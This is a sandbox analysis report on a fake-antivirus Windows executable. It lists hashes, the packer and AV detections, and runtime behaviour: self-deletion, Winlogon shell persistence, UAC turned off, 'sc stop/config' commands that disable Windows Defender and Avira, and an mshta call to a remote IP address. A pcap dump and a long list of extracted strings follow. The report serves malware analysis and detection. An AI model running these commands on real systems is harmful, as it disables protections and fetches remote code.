Totalhash sandbox scan report for the file with SHA1 411220efaeaee91c7ef4234ad910b862be8e6a5e



Analysis Date2013-12-08 21:37:26
MD5612632cc627f448c3411181d18cd57c2
SHA1411220efaeaee91c7ef4234ad910b862be8e6a5e

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section md5: 173f4245a3f7f3e68d2f8f5f562988c5 sha1: 038a2278d7d12cc3a5f4925ff2635612bc82c71c size: 232960
Section md5: 850834f045fa829affe01bf19879b31f sha1: fd040c9dc078d430d6f65d378b3f475ab8851072 size: 60928
Section md5: 86d8a2499167ccd5f51b8f6dea2e04fd sha1: 07097eb7abd98a8322074b16403712d0c77ee0ac size: 6656
Section.rsrc md5: 75922c292c8a69d715ffc261ec1f0cb7 sha1: dc11da3da2a379577d98060a9e0616e0cd4c0e20 size: 347648
Sectiondata md5: af5d63493b1703ce1f370f49affd3d8b sha1: 992d50e67a4ca959a460278dda033d3bd372944f size: 308224
Section.adata md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Timestamp2013-11-24 18:38:01
PackerASProtect v1.2
PEhash27ef684731b3e2313365e26e827ddfce85e643ad
AVmsseRogue:Win32/FakePAV
AVaviraTR/Fraud.Gen8
AVavgAdware Generic5.AKJE

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\guard-ospp.exe
Creates ProcessC:\WINDOWS\system32\cmd.exe /c del C:\411220~1.EXE >> NUL
Creates ProcessC:\Documents and Settings\Administrator\Application Data\guard-ospp.exe

Process
↳ C:\WINDOWS\system32\cmd.exe /c del C:\411220~1.EXE >> NUL

Creates FileNUL
Deletes FileC:\malware.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\guard-ospp.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Settings\UID ➝
cxrkhfihik\\x00
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments\SaveZoneInformation ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
C:\Documents and Settings\Administrator\Application Data\guard-ospp.exe\\x00
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations\LowRiskFileTypes ➝
.zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;\\x00
Creates FilePIPE\lsarpc
Creates Processsc config AntiVirSchedulerService start= disabled
Creates Processsc config AntiVirService start= disabled
Creates Processmshta.exe "http://109.236.86.173/?0=1&1=1&2=2&3=i&4=2600&5=0&6=1111&7=cxrkhfihik"
Creates Processsc stop WinDefend
Creates Processsc stop AntiVirService
Creates Processsc config WinDefend start= disabled
Creates Processsc stop msmpsvc
Creates Processsc config msmpsvc start= disabled
Creates Processsc config GuardX start= disabled
Creates Processsc stop GuardX
Creates MutexWinProt
Winsock URLhttp://checkip.dyndns.org/

Process
↳ sc stop WinDefend

Process
↳ sc config WinDefend start= disabled

Process
↳ sc stop msmpsvc

Process
↳ sc config msmpsvc start= disabled

Process
↳ sc stop AntiVirService

Process
↳ sc config AntiVirService start= disabled

Process
↳ sc config AntiVirSchedulerService start= disabled

Process
↳ sc stop GuardX

Process
↳ sc config GuardX start= disabled

Process
↳ mshta.exe "http://109.236.86.173/?0=1&1=1&2=2&3=i&4=2600&5=0&6=1111&7=cxrkhfihik"

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\109.236.86[1].htm
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Winsock DNS109.236.86.173

Network Details:

DNScheckip.dyndns.com
Type: A
216.146.43.70
DNScheckip.dyndns.com
Type: A
91.198.22.70
DNScheckip.dyndns.com
Type: A
216.146.38.70
DNScheckip.dyndns.com
Type: A
216.146.39.70
DNScheckip.dyndns.org
Type: A
HTTP GEThttp://checkip.dyndns.org/
User-Agent: Mozilla/4.0
HTTP GEThttp://109.236.86.173/?0=1&1=1&2=2&3=i&4=2600&5=0&6=1111&7=cxrkhfihik
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1031 ➝ 216.146.43.70:80
Flows TCP192.168.1.1:1033 ➝ 109.236.86.173:80

Raw Pcap
0x00000000 (00000)   47455420 2f204854 54502f31 2e310d0a   GET / HTTP/1.1..
0x00000010 (00016)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000020 (00032)   6c6c612f 342e300d 0a486f73 743a2063   lla/4.0..Host: c
0x00000030 (00048)   6865636b 69702e64 796e646e 732e6f72   heckip.dyndns.or
0x00000040 (00064)   670d0a0d 0a                           g....

0x00000000 (00000)   47455420 2f3f303d 3126313d 3126323d   GET /?0=1&1=1&2=
0x00000010 (00016)   3226333d 6926343d 32363030 26353d30   2&3=i&4=2600&5=0
0x00000020 (00032)   26363d31 31313126 373d6378 726b6866   &6=1111&7=cxrkhf
0x00000030 (00048)   6968696b 20485454 502f312e 310d0a41   ihik HTTP/1.1..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 41636365   ccept: */*..Acce
0x00000050 (00080)   70742d4c 616e6775 6167653a 20656e2d   pt-Language: en-
0x00000060 (00096)   75730d0a 41636365 70742d45 6e636f64   us..Accept-Encod
0x00000070 (00112)   696e673a 20677a69 702c2064 65666c61   ing: gzip, defla
0x00000080 (00128)   74650d0a 55736572 2d416765 6e743a20   te..User-Agent: 
0x00000090 (00144)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x000000a0 (00160)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x000000b0 (00176)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x000000c0 (00192)   313b2053 56313b20 2e4e4554 20434c52   1; SV1; .NET CLR
0x000000d0 (00208)   20322e30 2e353037 3237290d 0a486f73    2.0.50727)..Hos
0x000000e0 (00224)   743a2031 30392e32 33362e38 362e3137   t: 109.236.86.17
0x000000f0 (00240)   330d0a43 6f6e6e65 6374696f 6e3a204b   3..Connection: K
0x00000100 (00256)   6565702d 416c6976 650d0a0d 0a         eep-Alive....


Strings
APPROVE
DECLINE
DFGHJKL100
DFGHJKL1001
DFGHJKL10399
DFGHJKL111
DFGHJKL1122	DFGHJKL13
DFGHJKL134	DFGHJKL14
DFGHJKL160
DFGHJKL177
DFGHJKL18211
DFGHJKL190
DFGHJKL201
DFGHJKL202
DFGHJKL203
DFGHJKL204
DFGHJKL205
DFGHJKL206
DFGHJKL207
DFGHJKL20797
DFGHJKL208
DFGHJKL20804	DFGHJKL21	DFGHJKL23	DFGHJKL24
DFGHJKL240
DFGHJKL250
DFGHJKL274
DFGHJKL31048
DFGHJKL337
DFGHJKL349
DFGHJKL36867
DFGHJKL36869
DFGHJKL36871
DFGHJKL368711
DFGHJKL36872
DFGHJKL36884
DFGHJKL38738	DFGHJKL47
FLASH
FORM
MAINICON
PANEL1
PANEL2
SETTINGS
 (}+ _
._!	|:
( 	\@[
.}&=0_&
+-_"?0
00(Mw'VS
050607080910Z
0'6brH
0A!D*T+
0b,ago
0d|6ej
#0DL S"vZ
0$E-5%
0!G/$/
0GmM(@L
0\]]gP
.0/h)^X
0JPC{`
0/k7OD
0Kn|5%E
0#l<}=uh
0M\l	fV
0MN*Un
"0?$N)
` 0OR	(
0#qV"p
0!S=.45
0vEaNU
"0vOFW
0?=vZ<
0{=(W(
0W%fKj
&0*Z?c
:.@~1#
1105 Cinnamon ave1
110824000000Z
/{1-1X~
12345867
131108000000Z
141108235959Z0
1##:>5$`
@174 (	
17? cE
1983,N
%1-A}c6
1B57o.
1bIoCAM
1bpBdy
1C+b|(4
'1e2	9
1ee}zW
*1Fhrxj
1H$jL;
1http://crl.usertrust.com/UTN-USERFirst-Object.crl0t
1http://crt.usertrust.com/UTNAddTrustObject_CA.crt0%
1*	iHb
1Jvbc?TR
-1J_:Z
1K^&H"U
%@1LQ5
1lw9:^?;
?1lZ|^
1Nu{exl6
1*n.}'z
1O9!y.
1=PRFc
1?pyR{
1p?zyk
1rfFiEh
*1S49o
'1u]^a
1&v0$1~
1WOL_,
1Xq`%Q
}1$y{z
1]	?zI
|`#=2%
200530104838Z0
200530104838Z0{1
20=ivvO
20TfO5
29NnwXJJ/
|2;a*NiB
2bgafa'Y
\|2!bk
|_2c_R
:&2dK	i
2DwM{H
2f_PTd
2_hoF$l
:|2J`;e
?2kj0n
+2l#d%
<_2{]m`
2|m:gK=P
2~\mrbgn
\2?o/+1
2;pPXg[
2R0ZC4
2s[519
2S+"&H
&2swn1S
{2=TQ+
2/XoHz
/,?2XU
302sLRvY
31iOB<
	39E:A
>?3A:sh
3!bDQ&
3b	*EC
#3$dJS
3f6 W3
3f=P3R
`\3f$Y
3http://crl.usertrust.com/AddTrustExternalCARoot.crl05
3I6d{@
3IA/7L
<3lzC)
,3N=F_H	]d
3P;n/A
3(PP;g
$3r&aS
>\3R w@$
3	[$S+
3si,Xs
3T{$#Zu
3UaM3q
3ut.T[
3v.BV;
3W` %<
=[3wh(
3w)Qw*/
	3--	^x
)-3ySb
	3YWv@C7?f
41XfX'
<* 43(
+:4/3:
4;!8;Q
&49]r9
4a-+Ju
4ALDWWu)
$=|4%c`nN
4Eb>hO
"4FlhG
4Fsb[?3
^\4G.@
,^4},I
4|IVjw
/4LYg8
4'Nc>j
4o!;kUp
<4P0{:>
|4pp}R
4re	=Xc
!4s);+
$:4;T<\=`>d?h?l?p?t?x?|?
4U.`rOt,
4'vXB-@A
4Z(_Fx
.,/4zm
51SaZiQ
_5	)2'@
.52`*S" 7,
53j\\C
54F%#2>T: 
55Hm&RIN^T+;p
5#67r~
5\]7jf
5/9)4E2
\ 5D1:
5~D3T%P
$5EfS<
}+_5fbZ
5G_9@&
5h`ltJ
#(5J#HO
^5j	m$w
5)/L?y
5mHs6]
5qo_G`
!5r't/
5T`Wj#Q
5	UGxpq"R1qrI
5V{u7@
+5yon\9-S
61MUX?
6b.25qA;
6B4:H6
6B%9N`YgU
6?D+S2
6E:q-$!
6 g0W9
6ha*>=LQ
6iY^>6
6J>$`8BD
}6O:d3
(}6~orX
# 6PNRW
6<PSQ1
+6rU;5
|6Sd"k
/6:}{T
6t,Ug@
.71)If
72,2m5
7	* 8YA
798L1v	
,7D,"3(
+7D(D{0
'7]_Ed?
7E!X{S
7):#f"
7^ig|TP+	
7(!mCY}
7Px7-D3
7`\))q
}7Q\ZU
7#U84t
7vTvT~
7x.Kl"
8$;}={
80ym[oW
/8{1Y"a
 82P4h/&Q:p
82SCL>
>'?.84\a
88Eh5{
*88t#(
8(90[a
89ABCDE
8|9T^U
8*>a^I:e
$>8C^6
8C7;Tk
%8*ex`
8f5BiF
@8F.`i
8F*vLcY
&8J`+'
8$j,Sa
8M/9$yK
%8@my,f
8o:n?|(y
8P$:c;
8Q S#t?
#&/8R!
;8 }r9
%_{#8u
8&,<U)
-8uEC''kKZ
&,8w;\
,8x{.>
<8Y9"Kn
8ZH?}d
/8=zYyb
9=1rO~
946F@AT
94=^jR5hGr
95R7c"
 95W\L
974041
98":5~
(98tk?
}/9&@9
9aE1fM
9fK>"X
9f*<Z,m
9Hka-z=6
9knK1,
>,9Ltc
 9P@s`bY
9Pw8x.c
9T~"/}'
9wJzEo
9wZ`X:^
A#1?!'0#
a_\2[a
A{"4"	-3
a|4c! 
A5y_>(Z#
{&;A7	
!:a<,8
a8SRxy
$a92Z)
A_;A7Ct:L
A<a,mM
!a@A~]]XV
A{B\E"
AB+< |P
Abu%={^
"##Ac&
ac2Z7J
A%CGp.
.adata
AddTrust AB1&0$
AddTrust External CA Root0
AddTrust External TTP Network1"0 
advapi32.dll
${a;e#^
@Ae3;P
aeio#P	
A|f4>&s3Z	
!a?~Fk
Ag3ZoS
A*`GeL{
ahA&<@g{*
 AItS.
~AIW{F,R
A#j^?q
.ajs`J
 aJw]x
ak 6Y+
A%]kUv
a@N`/z
 A%=op
{~aoT1
_ APD@
(AP^Ez
arFile
</assembly>
      <assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
`} au(
.	{A?u
@ }AU%s
=+a"V+:c3a
a$`VClU
aV-v.Z
_Awjyz3L_
A&x!(d-
+aX}d8
}Axe	*vo=\
a(&$`-xhzQ
Ax`=.TN
a@X yi
|a-yj9
'aYWF!9
A*z ]BV
azE>tU
a.z=|R
/.+B%;
B_$} '
b306n`h
B3}X&H
$b50`7#k
B50I(=|g
B|5($T
B)6&7x
B')7l'.j
b9ffn]$
ba]#!:#5
BAU))B
 (BB,~
b$b[5{
~*bBD2J!S0
/BC5<F3
bcR^&R
bdx|8fg
bfgy~}
BfST<H
b=h;_0
bh9/F-
B`HMDo
BI|V@K
@BJ!\+
BkafZa
b<KT;c
<blB>]W
BnCaYk
-<b"^o
B#OoI%oJ%
Bp J|;
]b:PQ$
+BPQ*{
> Bp<RE
bpXZE5
B/qb].P
#bqGRg
bQK65!
b$rS%(E
B]+`sA
BSX2hx
=bu8O}:
buxuy+
	B^?WG
|BWPN<W
\:bx4q
BXH	pJ
BXW'=+
b#y0=1w
B;)yH\
&BY@m*
:ByQ4]
bZ]3bCZ
bZJrK^
<$=,>c
!C~|)]
C?$[+"
<)C^"2
#. C2	
c6PA^q
c7L5v0
{?%C8Q
%C(`&C
*${c.cG
CDEFGH
CD,Ktg
cDr\*T
/=_cDSz
CFGWz;
}cFS#$
c'/goZ
?cG}."P
CH1eTt
C=)Hib
'CHK%dTT
C](h`U4
`CI\|!
Cjd[Mh
cjLN}H
"%"cK\
C$kh$&
C/}}]l~
C]L4#L
CmAdnQG
cm~MN5
,_C@Mt
c:m;w<
C`N|\F
C>O0%;
CoInitialize
comctl32.dll
comdlg32.dll
COMODO CA Limited1!0
COMODO Code Signing CA 20
CoMvC_
/&cP8y
-CPQy`
CreateStdAccessibleObject
c[`R	q@
C=S@z>
cU@AQI
Cuor0psV
cUTz:6
cV5@Jw
cwxoVpShG=
C	Y;f!q
CYft<l
cym[^c
.cYzL8~
"\d;%%
=&d)4$
`D8]%@
D8=[P?W
dAA^Q[
DaKRJu&?A
D`?AY!~Kk
DbmAuaf|
dC$4S $
DccSd>Vs
`D!['<d
%DE4#s
defghij
`'dEhJ
  </dependency>
  <dependency>
    </dependentAssembly>
    <dependentAssembly>
DF^~~CP
dfm@(+he
DFTE_M
D#g@7,
``dh86
=D>H?L*`3S
d@(I'0
:diS$*
dj%8fi
^dJsq{
=dk.-e
#Dk^LH
dkX~ _V^
?dl@G^
D$lx|M
D_~O~~
DocumentPropertiesW
DP/1Ahg0
d	/p1i
d	,Prt
DragFinish
`dRH$Z
&#d\Rl
DS[xpT
*D/UK(
+d.~V&
dVGY8z
dvP@Bo
D]vSx d
|>dw/x
dx$%9Bzl
:d|xJo
dXWc@]h
Dxzo0<
d@y'F^
DYk&K9n~	
D!%Z8	
DzY*'Ef
e 0qs	
=E0(YWe
)e;4ec9a
e+:{6^
E9%BI#i
E}9DGO}
Eb(`$a
eBySG+
,EcsCm%Q
edHs1\
e|E4/R
EeH*~"
,E;G=,
%eG~dy
E\HDgZ
;Ehooj
Ei,I a
%eiuw	8]
ejaic,
Ej:A\r
+ ejOr
[e?JuRB
el_f}/
E/LNT"
eLq;~:
E*LuZf
e?ml8 
EMO;4(
E@n0f:
E:na==$
eN dhE
 enDX9%
%EoX>/L\z&
%[EP50
Ep<f6Yp
Ep<g\2
EpP/GL
E]PS,XG
$ep@WSXA^
'[ErbdY
erO`0DTT8
eR}Tt^
ES5&',Z(
	}Esh<k
E>^sl-
es|\N4{;
eT$8zZn
"	eT<YK
&("eu"
Eu4D4>
Eugene1
;EVb9[(2
eVIsOO
$eV|jA	
ew9|YS
.|E wY
E"xC9'C=4
e^XenJ
E+xk,'
eYHW)h
[-{eYs3BG
ezvY57
>}^*,F
"_F="<
[F`_~(
&-@)F<
f'3\JZZ
F;\48*
F`<4H%Ok
*F5u>C
f7eE+2<
]`'F9Ca
{#fA#Bi";
-f\Ai)x
}f^@}ANK
F*D	.,
(FD&o_
F+Eb`%
]f:f?,
fF7>-Hy
fHEc!j
FIa,o$I
fixmyoy
fjt!qt
%fk3rE
f=L7p7e
FLa,2B
~Fm3)0
F\"M:e
f/N\| 
fN6 PpB
/fN%-h
Fnw#4lCn
_fo{FQP
.FO!+LB
FQ	@W 
{"fqYF
FQyQuz,^|!
#&/f:R
!fsegB
fS?ePxQ
FS"HC_
|fsh]u
F+SSm}
F@tcH'
{&f)tD
F-#U3q
Fu;H	hQp
f+uw_V<n
	F%V{/6
$>F[w]
f;W|{5f'A
`fx1['
}FY0Ck
Fy.*c/q
,F'YPw
FY<V5}!
fZ@Vlc
g0,nT~^
g=1rH)
= G@3\RJ
G@4__2
`G46?z
	}g5+Wx
G6*t40
g7)d|I
)g()9'
g9<?eE
g9e"Eg
G~9&GT
gavc `wV
$(	g>b
~;gB^<
gb7I*l
GBi_vO
_GC@`{
Gc*2p[
gdi32.dll
GdipDrawImageI
gdiplus.dll
|G/d|K
()GDq{}
?g@?E7Y
,[gebka
GetFileTitleW
GetFileVersionInfoW
GetModuleHandleA
GetProcAddress
GetProcessImageFileNameW
GetTopWindow
]gEw`\
&g?_fA
g-+;g5
GHi6?R$
GHpuG2
`g\:HR:7X
Gi4mcL-!
GJu9(S
G%LD";
?`g&le
g{O%Hv:a
g	)otH
gP5dVP
GP?DPo
gPScDG
GqP*cD
gQ,^-R
GradientFill
Greater Manchester1
gR=T"5
Gr=&VS
G%SBzys[C
GSk-,z
,GSMvH
\gs!rg
Gt%W1s
Gtx~-&
#gu5I%s
gu8?K<z
g utrI
GUtzCI
<gv[<O7
g>wLD:
gx8|"P
GXh\h1_m#y
\'gxZ@
+>G+"Y
>G'z3P
gz{}bD7CN
=|H?=*0
H3ysgL
H-4,rc
H5(ry(
H8Qjws
H8}{=U
H95q$Q^
H9.K>0
[h	,`!a
hAIZ]g
ha[	OE)
HB3{*+J
=HBJt4chp
hBx.Ze4Wbh
{HD~v 8
H~_D#W5@
h+/fd<PZ
Hfikj9
HFTcQ	
/h-[g_
HGEk3y
HH/$DA[
h@heG6
H(ix ZL[`
hJ^?CYf
=H[Jm9 
HM*Ik\
hN"}7'
Hn%Q;W
HnRLKX
hO7Z/8
ho.I1j
h^]p-_
hp~!J3
HRk"2q
: H{svz[!
H*s:Z:
.h=-&t%
#H"t^d'h
HT!&iU/
ht@Sjp
http://ocsp.usertrust.com0
http://www.usertrust.com1
H\VcsJz
HVz(F7
Hwp<b?x
HyH1|I
HYJB[@
hYQy`@
hZp,!?AH
.[}].I
i0jl`=
I=0-N*
I 11[ E<
i1?K:V
%i2+MF
i3$S`02
i6e(JJX
*I7-F4
I*8nKFU
I9wa?k6
Ib5,n2
i"b7]J
ib-Bac
ib%,~t1pL
.IB'Tv
`Ic_=@
ic)0w7,
iCD:n?
ic.&F%
IcPjys 
id	FxE
i;dJv-
),iE,m
'|Iew3L
i=gc+_
*IgGE&
IH@bdtl
,Ihj!AB5
IHMhh'
iI9(A]
@I#IKi
IiRelc
I:JPj)D
i&J,Ww
I}&JyL
ILg^#Et8
IlO%z@
i}L|u>
IM2BwB
*I&Mn)
+i^mq[G
INF'AKk&
InternetCloseHandle
IO^;3v}^!
IO\rM@k
iP#1WQv
$IS:@2>U
#iS3Za
=iS"	D
i@^#Skt
<ISlvZ
~=ITk>
ItNhdE
I"t s 
.I"%;V3
iVNqv>
I<!vQC
ix9KF)
iXU6p1j
i]y!m~
iY?wdIR?
IzbJtg
IZIOty
IZl{NB
~|"$j#
:@j;^<
*;j0|j*
j0o"l<
j	2L	d
;J	3f>
|j4='.!
,(j4$rF[
J|.5;%
j-5:jA
j7,}k1
'j7OO0[v	
j9@paS
jawTzKI
\j<c%o
-=J/CSX
+J[EAw
J.EcnD)
:Jej_@
j[EVQQS
JfBy@u*b
(+jG2<
jg# 6D
JG%D4z
+JgY]@\
JhWqf#A
jJF5ex
jmmgHq
,JN5h-~dj
jns[5JZ
John W.Richard0
John W.Richard1
#Jomre7E
jP-B~|z
j.pk9]U
'j$PtH
JPV=|=
>J[U6K
j%uirt
J?w2-o
*j}Yf~
 jyvJ/
JZ)9{B"p
JZ"!)w
<\k|"	
k  =-!
>K1P{aC]R
\K^4%5
:k5?e*
&k\5}/K-
>~k!6!
k6UpS5i
'K`)9C!)
KBoC(U
kB|V-5
K$b,x)?
KcC]4FvQ
KcCoub,
k|$D[8
^keCc~~
k-_eHP
kernel32.dll
kE$[YHl
K^f3!s
+kFVI&
kGFXU7
KGRLD\
KHM{O8yD
'KiJj6
-"kKKl
kKn0Hq|
kL0qXds8
@kL=+F
?k{-$m-
\k,mw$*Y
-KN	{`
KnkaE%
K~n:(R
KO!7z-H
@k<o$=Yv
kpJs:S
[k>p#yrE
K^;Q]d$
Kq!QTg=
k:-qzs
K-ron/d
Krr~1N
)Kse,P]
kSx%]jL
kuI49~:
Ku>&q=
KV^-4F
K$`-vT
k?WgCg
KXq\zh
kYty<-
Kz9Hb^
/K-zoX
`$}l&@@<
-,(l&=
>L0|K!
L2[2uD)Fd
l4C6cjF(
{_};_!L5
l;^8n|l
,L9HWV
:$l~a!
lahOm	A
Laoq|3
!lBoSuD
lb's|u3
,l$cJE/
l:,"C^W
l	Dnhoe
Lec|A<
lEdYn$
L F<RO;:
LF'X/Q
?Lgfeh
,LG(w,
L"hdv	
L&HmkK
#"lh@n
l!JzRw
@lkg<:
LLtm[A
lMcX%%J$k
l}_Moi
L (mv\_
$L|,NK
l=NRJ-?
LoadLibraryA
LO{xh/
Lq4/3"
Lq+UXi
+(LR%\
Lr{VF(
*l#Rwl
l!$Sv$
=l|,]T
	Lt~4>
,Lt75k
ltM*0D
lUnb2j(
-?lVzY
L-W{8#^
Lw/Ftrz
LwkB scK!
lwL4$O9
l<w#XL
.)lx2]q
L;x=_W
M'2nx{
M4^#hcvs
M*4^Xf/8
M6C,r7g
m9+t26v
`!"M	A
Maa53U
Mbw{6X
McgQpL
Mc=M*x{
mD&'De2X
mE`M+}
mGI9B K
\MiId~/6Y
mjy:0]
	MjZa+
/'mk\h
m>kUe$
M-lrE'6
mnopqr
)mO	<#
*M[\	o
!?MO]+
"M/oqK
mOTQqJ/
MRQp27
mR*yHg
mshPXk
msimg32.dll
Mt685/
mtAq-z
M_t~Lq
\MU#d)(
m vA~}
MV;_c9dX
|m])X=
`MxrLtma*I~
MY7"-c
MY*V].
?!&Mz0
M/ZDB^
mZ`F#%Im
;mz*uCsa
n|,)`<
.@,N!-
n0,!kt
n1bmajny
n@#"2DA
=n2$Q*
n2r@tv
"`n2=zD
n!3v!v
`;#n3w
N4:--B4t
n6wN5h
n79	$@
NA]PP]
|NaYyP
+,!nbt
>!NcHQ
<n#cI9
ncMq%EHa
ncoqr@
nCURPv\
nf9Rw|
_Nfc97D
n'f) U&
ng/E&vY!
n`_'>gq
:n|HT3
<Nj35i
]NJyzD~p
`N\KW|T
nlEMk9
nM-[My;	
n-||&n
n]\n1v
N*OCf=z
\Nq/3l
N+]Q9xCg
n"Qfqrm
?"}}|nr
]nr)G|
NrgOFE
NRj6IK
,|nS:*/
%NS4b9]j
Nsh>,`
N;tCP/
nT<=qk
/nug%`
nuglIS
n!/#uN
NV;dfq
 Nv>g,
[NwN]X
nXBRyh
/Nx%Ni
n%XT}0
#n)-!z}
{	Nz%K
/%o)`()
o0@d)>
o$.|1x
O$3Q=5
o4Nbu2
/O+:7#
o79)Au
~O7Eb]
O:8%gz=
O-8N59
@oaf|DU
o"a:G%.
o'BcPM
-+? $obo-w
<^%O(cf
^=$od\
O%:|dF
O[;-D_sG
?odY[6H=
OdyU !
#O]Ev>
O?gNDw
oh<G	2
)\O|HO/8
OH?y0.
{O/Jb4D
OK-tby
$OKt@q
+OL1_b
OL:"]d
ole32.dll
oleacc.dll
oleaut32.dll
oledlg.dll
OleUIBusyW
$ol	UM
[_OLuy
OM;^%3
oMkOxMyc!?
oOFVycl
o%~p<]'
<>oPt&
opuXS-
&O;$_}q 
OQ+86*,
Oregon1
O^;s!*
OtPq!> 
Otsk/X0
+|&o/u
OvnzE>
OXM&^h
Ox^/:O"
OxuNh"m>c
oy2=PqN
O yHogY
@P*1rWt
!p61H.
p7FkR^~Wl7
`p8Eiw)
p9)|C>
 pA<[`
@\pag@
p@'al#
PathIsUNCW
P<baX~I#^-
pb:i	d^N
pbm{^,Ii!
\/p!bp&
PB!uo^
PCM?Qjme
pcVI|A
PC%WLX
p $dir?
pe4q6-
pem%##
"PeXwq`
+PF	Mx
$}PGFl
-phVpK
]pjCJZp
pjXv}K
p_k4Ck)
P/KQnP	t
^pLEl~t
pLr8MJ
pm0~&>P%MT
;pmb:yK
pM=eVP17
P`o5TS
Po8^<:
pOjM.B
/POMxr3
P*~paZ
)PPBrT5
!p<Pf~
P@*PUE=
printfL
Produc
psapi.dll
p(Sq }'
PT4Vs5
	"ptAk
p]Tl!)
Ptss>NC{
p*T?v>
PtVisible
PUMaskV
}PWD_r
*pWKAZf,.
pW=VJ^kx
>pwZP8
p\YMn\h
p()"~z)`[
.(Pz}^
P]_Z) 
`P%<ZU
&pzUd -
!q}2!w
q-4WEa
?Q9)d,
q?"9sX~
q9wXM:
Q#aB7}
q,A>!l^
Qb+*pBG
^q|%cR$zp
qDPl%a
Q~dQ|3
\q@DR.
_	\qhB
qjVJM)+
)Q~K[:
qK6+slc
*Q.^+kQ
*ql\<)
'?qm47
qm/6s"
qM%[#x
&qn:4"
^q;Nc@
QnVuzrR
Qoc<^j
-qO_&"T
(QP#0K
{qp^bu
q>=PJ]
	qP|JUDl
Qq./&?
[ q)S`DH
qTH?@B
qUBhUA
?q#uDv8
{QV6yDi.A
)Qv&eC
qVF>8+
"qV}Jc:
QW4rQ^
/Qwen_]
q{wHxO
Q%y	6B2!
-QYg^7
QYhVxd`
\Qy~,lr
Q~ZUCF
<%@.>,r
R2\1]f
r5NPNY
\	/R6_
.r6yKf9
$R8rK	
RaiseException
>Rbwun
rC5)\s
rC9IDv
RCP5oO
rCZc%q
r=de4X
\RdJ?&z
r;e]2{
r<EF+))
RegQueryValueW
R{Eyoi
^<RFn;
R+(f!nOZ
\\;-Rg
`rG92n
r-g&.D
rgpCbw
R<G,Z$
R H!`7
[R+]h'eaL
R?h:[n
:RiArV
r=jcp\-
R&j~'eA 
Rjw3B}^$
r"L8>B
rL8N<l
R!l#LC
RlpgWq
`#R$}p
rpttvxx|z
@rqF(B
rrA\=Zc
RrnBH%
&rr}YE
RS}sR4
 rtVM_#
;r*u\.
Runtime 
,rV"?@
:^#Rv0
>/r=vi
r*=$!W
R<W=j>o
)rwKdHW
?rWK% G
|rx9t 
!RXK?/
R^yv.0
~rzAep
_[RZJ"
_r=zU'
'-!S'?& 
s2-g<6;
[<.S5>&
s7|Ive
s8@QE.
s9S9oz*
Salford1
Salt Lake City1
S'{!Bt1>+
SC|ANQ
SCcIPT
s`cf	v
(S!cx-g
S	Eig9Y
S:'%'EO(
^+*S&|F
sF5P1|d
?sfI4bX`
<.'sGxg
]sgYFf>
shell32.dll
shlwapi.dll
SHy oW
SIrEyb
|,SIyo
\sKYf6
@_`sl0
S`L&dD
s,loCH/z
s>LO;e
sm~C$S
|s*;n.
|(sN!&9p
 snU)>
Snx1T#
/@sNxPz
Specvk
s"?R.%
	s$s	F
S&sIGg!
Strin5g:X
	@SubwX
\sU%xH
sUy5ku>
sVg?F=&
sv"N_;#na
:<SVS3#
swe{C<y
SW}hhk
SwZa,	c
SXF6C+
SX'[H4c
sxVVg?
SY+nO!z
|syws~
t2CV3m
T|6 /k
t6vc[o
T7*Y p
T^933u
tap"R{
T<)b_b0
T^B@!z
tcg~0k:p@:
tc%y|'
`TEMFr
tfA/Vr/
T fira
TfkBwXrO
TheJp>
The USERTRUST Network1!0
!This program cannot be run in DOS mode.
t;JG],
tK%e&@
T$lNw9
t$M]	/
tm|#Ao
t(mC==
tN!3xJ
To&o[.3
*-t Pm
tq2!%Tr
|TQ_J-
TR0_]a
_TrackMouseEvent
T;RKPCR
trl!S4
TS0*^O
<:ts7v
TSuaFU
TSynchrZ
t%[Ta@
T~uI0u
tvAXlh
t}v:d.
@:TV.J1
TvP?{e
t>W:0Z
($TW|6lg!H
tWH/uw:
>tWo+mI7
`=T[<X
$T|Xk:
t ZB$7K	
 ;~<~u
*+	,-./u
`}u 0o
?\/U3?cn
-U>4qa
-U5gWt
!U6B{wk
>U|$6+d
U80Nb=
U"9fh\
U<9L+A
Ubxg{}q
ucc~*W
ucj&hC
uCM{)V
%Ud(/G
U\eX8-
u'^[@g
(<_U<h
uHh4lT
uH	ig(
